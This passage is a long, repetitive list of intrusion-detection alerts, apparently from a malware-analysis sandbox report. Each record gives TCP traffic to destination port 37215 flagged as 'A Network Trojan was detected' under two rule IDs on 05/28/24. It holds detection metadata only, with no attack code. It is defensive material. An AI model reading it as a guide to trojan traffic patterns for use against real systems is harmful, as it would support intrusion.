            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437057
            SID:2829579
            Source Port:58594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954054
            SID:2835222
            Source Port:54978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995826
            SID:2835222
            Source Port:46762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868338
            SID:2835222
            Source Port:33566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807769
            SID:2835222
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398157
            SID:2829579
            Source Port:33560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909978
            SID:2835222
            Source Port:38172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745587
            SID:2829579
            Source Port:45702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263652
            SID:2829579
            Source Port:49994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051383
            SID:2829579
            Source Port:46890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556495
            SID:2829579
            Source Port:37822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500294
            SID:2835222
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863506
            SID:2829579
            Source Port:52296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505603
            SID:2835222
            Source Port:54314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917767
            SID:2829579
            Source Port:42454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808283
            SID:2835222
            Source Port:49746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680192
            SID:2835222
            Source Port:47720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685387
            SID:2829579
            Source Port:54072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751203
            SID:2829579
            Source Port:44316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856277
            SID:2835222
            Source Port:54056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935181
            SID:2835222
            Source Port:49592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880137
            SID:2835222
            Source Port:58648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601750
            SID:2829579
            Source Port:59946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847370
            SID:2835222
            Source Port:38998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922317
            SID:2829579
            Source Port:56338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926549
            SID:2829579
            Source Port:54316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969931
            SID:2835222
            Source Port:34088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778108
            SID:2829579
            Source Port:43540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944069
            SID:2829579
            Source Port:52416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323212
            SID:2835222
            Source Port:57606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922603
            SID:2835222
            Source Port:46850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299894
            SID:2829579
            Source Port:35018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358949
            SID:2835222
            Source Port:39014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273383
            SID:2835222
            Source Port:51018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828966
            SID:2835222
            Source Port:46544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818876
            SID:2829579
            Source Port:34570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073085
            SID:2835222
            Source Port:46022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883335
            SID:2829579
            Source Port:59312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275034
            SID:2835222
            Source Port:56784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954665
            SID:2835222
            Source Port:42136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941730
            SID:2835222
            Source Port:53958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561783
            SID:2829579
            Source Port:40654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533406
            SID:2835222
            Source Port:41690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757748
            SID:2829579
            Source Port:34170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789093
            SID:2835222
            Source Port:36058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012297
            SID:2835222
            Source Port:53882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304103
            SID:2835222
            Source Port:55446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507273
            SID:2829579
            Source Port:40600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432625
            SID:2829579
            Source Port:44232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711326
            SID:2835222
            Source Port:51998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741606
            SID:2835222
            Source Port:34188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727728
            SID:2829579
            Source Port:43222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923441
            SID:2835222
            Source Port:52772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969361
            SID:2835222
            Source Port:43914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812685
            SID:2835222
            Source Port:35748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299278
            SID:2835222
            Source Port:59640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909825
            SID:2829579
            Source Port:51394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773703
            SID:2835222
            Source Port:33432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556976
            SID:2835222
            Source Port:50510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443496
            SID:2829579
            Source Port:60570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812637
            SID:2829579
            Source Port:60474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.057104
            SID:2835222
            Source Port:38630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867423
            SID:2829579
            Source Port:49594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849673
            SID:2829579
            Source Port:52788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320574
            SID:2829579
            Source Port:56952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.723362
            SID:2829579
            Source Port:55726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927156
            SID:2829579
            Source Port:39208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495170
            SID:2835222
            Source Port:48902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374443
            SID:2835222
            Source Port:51444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735475
            SID:2829579
            Source Port:48516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010585
            SID:2835222
            Source Port:54256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826291
            SID:2829579
            Source Port:49720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910869
            SID:2829579
            Source Port:39304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065818
            SID:2829579
            Source Port:52810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899764
            SID:2829579
            Source Port:48602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931834
            SID:2829579
            Source Port:54432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862107
            SID:2829579
            Source Port:41854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938209
            SID:2829579
            Source Port:59426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697833
            SID:2835222
            Source Port:51120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927174
            SID:2835222
            Source Port:58578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793702
            SID:2829579
            Source Port:52438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506610
            SID:2829579
            Source Port:33426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804326
            SID:2829579
            Source Port:37786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881324
            SID:2829579
            Source Port:56684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506825
            SID:2829579
            Source Port:44110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552640
            SID:2835222
            Source Port:55952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.554735
            SID:2835222
            Source Port:60498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777699
            SID:2835222
            Source Port:33844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.988535
            SID:2835222
            Source Port:47218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879684
            SID:2835222
            Source Port:53318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319101
            SID:2835222
            Source Port:55898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059748
            SID:2829579
            Source Port:50620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793495
            SID:2829579
            Source Port:42286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937345
            SID:2835222
            Source Port:40108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734896
            SID:2829579
            Source Port:43030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912014
            SID:2835222
            Source Port:59718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777051
            SID:2835222
            Source Port:46448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471249
            SID:2829579
            Source Port:40370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453973
            SID:2829579
            Source Port:47838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937018
            SID:2829579
            Source Port:34762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873471
            SID:2835222
            Source Port:58216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774075
            SID:2829579
            Source Port:59516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058561
            SID:2829579
            Source Port:47920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519802
            SID:2835222
            Source Port:48994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745442
            SID:2829579
            Source Port:54102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387490
            SID:2829579
            Source Port:42504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704697
            SID:2829579
            Source Port:33824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804390
            SID:2835222
            Source Port:37496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043243
            SID:2829579
            Source Port:56778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459585
            SID:2829579
            Source Port:35756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756534
            SID:2829579
            Source Port:51834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.006633
            SID:2829579
            Source Port:34078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.846964
            SID:2829579
            Source Port:35544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867133
            SID:2835222
            Source Port:52712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.664462
            SID:2835222
            Source Port:60182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998027
            SID:2835222
            Source Port:44678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312958
            SID:2835222
            Source Port:45820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663927
            SID:2829579
            Source Port:47728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263502
            SID:2829579
            Source Port:43118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955856
            SID:2829579
            Source Port:48606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840545
            SID:2829579
            Source Port:34628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840036
            SID:2829579
            Source Port:33220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685351
            SID:2829579
            Source Port:53008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899876
            SID:2829579
            Source Port:43944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.921740
            SID:2829579
            Source Port:44740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295123
            SID:2829579
            Source Port:45112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.303230
            SID:2829579
            Source Port:36118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000807
            SID:2829579
            Source Port:43020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870125
            SID:2829579
            Source Port:44484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710064
            SID:2835222
            Source Port:57556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424038
            SID:2829579
            Source Port:37956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776723
            SID:2835222
            Source Port:57920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843789
            SID:2829579
            Source Port:44734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444717
            SID:2835222
            Source Port:49048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.744139
            SID:2829579
            Source Port:50022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279723
            SID:2829579
            Source Port:34538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.407693
            SID:2829579
            Source Port:49060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872285
            SID:2829579
            Source Port:38872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298388
            SID:2829579
            Source Port:53030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936242
            SID:2835222
            Source Port:39152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.803925
            SID:2835222
            Source Port:40604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836773
            SID:2829579
            Source Port:37406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047910
            SID:2835222
            Source Port:48914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955882
            SID:2829579
            Source Port:43278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064115
            SID:2829579
            Source Port:58894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.566515
            SID:2835222
            Source Port:43140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870517
            SID:2835222
            Source Port:34806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812036
            SID:2835222
            Source Port:42046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962921
            SID:2829579
            Source Port:49584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871738
            SID:2829579
            Source Port:45262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856378
            SID:2835222
            Source Port:49700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.912890
            SID:2829579
            Source Port:33616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.492625
            SID:2835222
            Source Port:51844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986187
            SID:2829579
            Source Port:51764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046936
            SID:2829579
            Source Port:39926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431319
            SID:2829579
            Source Port:36226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394375
            SID:2835222
            Source Port:46220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412690
            SID:2835222
            Source Port:43152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310798
            SID:2829579
            Source Port:52378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.017119
            SID:2835222
            Source Port:55452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.659769
            SID:2835222
            Source Port:37642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748375
            SID:2829579
            Source Port:36032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542059
            SID:2835222
            Source Port:58570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898928
            SID:2829579
            Source Port:34278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740380
            SID:2829579
            Source Port:56114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778824
            SID:2829579
            Source Port:58344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870164
            SID:2829579
            Source Port:49892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871288
            SID:2829579
            Source Port:43682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967059
            SID:2829579
            Source Port:35456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937064
            SID:2829579
            Source Port:40468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733246
            SID:2829579
            Source Port:46414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737796
            SID:2829579
            Source Port:53078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558608
            SID:2829579
            Source Port:35494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379882
            SID:2835222
            Source Port:46692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961190
            SID:2829579
            Source Port:39262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381463
            SID:2829579
            Source Port:59624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783579
            SID:2829579
            Source Port:44772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057331
            SID:2835222
            Source Port:50264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902738
            SID:2835222
            Source Port:38574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310909
            SID:2829579
            Source Port:39212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961070
            SID:2829579
            Source Port:42336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.613064
            SID:2835222
            Source Port:38536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941765
            SID:2835222
            Source Port:35364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.367194
            SID:2829579
            Source Port:41542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378211
            SID:2835222
            Source Port:58024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033200
            SID:2829579
            Source Port:56158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553456
            SID:2835222
            Source Port:50700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.068542
            SID:2835222
            Source Port:33810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955675
            SID:2829579
            Source Port:45968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762075
            SID:2835222
            Source Port:35392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899354
            SID:2829579
            Source Port:47048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669325
            SID:2835222
            Source Port:45360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768087
            SID:2835222
            Source Port:49908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913989
            SID:2829579
            Source Port:41412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753715
            SID:2835222
            Source Port:34858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767397
            SID:2835222
            Source Port:46516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000613
            SID:2829579
            Source Port:55456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
